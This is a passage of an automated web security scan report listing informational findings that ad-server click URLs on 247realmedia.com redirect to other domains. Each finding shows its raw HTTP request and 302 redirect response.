GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1839652180/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:05:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.296. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1852755455/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1852755455/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1852755455/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.myonlinepubs.com/publication?i=59161

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1852755455/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:00:52 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.myonlinepubs.com/publication?i=59161
Content-Length: 323
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.myonlinepubs.com/publication?i=59161">here</a>
...[SNIP]...

20.297. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1868324146/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1868324146/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1868324146/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1868324146/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:45:16 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.298. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1881654176/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1881654176/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1881654176/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1881654176/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:44:40 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.299. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1882825683/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1882825683/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1882825683/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1882825683/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:45:08 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.300. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1885911438/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1885911438/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1885911438/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1885911438/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:59:01 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.301. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/188597572/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/188597572/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/188597572/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/188597572/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:57:08 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.302. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1897798837/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1897798837/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1897798837/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1897798837/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:13:18 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.303. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1898634487/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1898634487/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1898634487/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1898634487/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:45:26 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.304. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1908811162/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1908811162/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1908811162/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1908811162/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:58:50 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.305. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1909625640/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1909625640/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1909625640/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1909625640/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:16:50 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.306. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/19190715/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/19190715/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/19190715/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/19190715/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:41:14 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.307. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1921522918/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1921522918/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1921522918/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1921522918/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:54:19 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.308. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1921995207/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1921995207/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1921995207/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1921995207/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:35:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.309. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1923149033/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1923149033/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1923149033/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1923149033/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:35:02 GMT
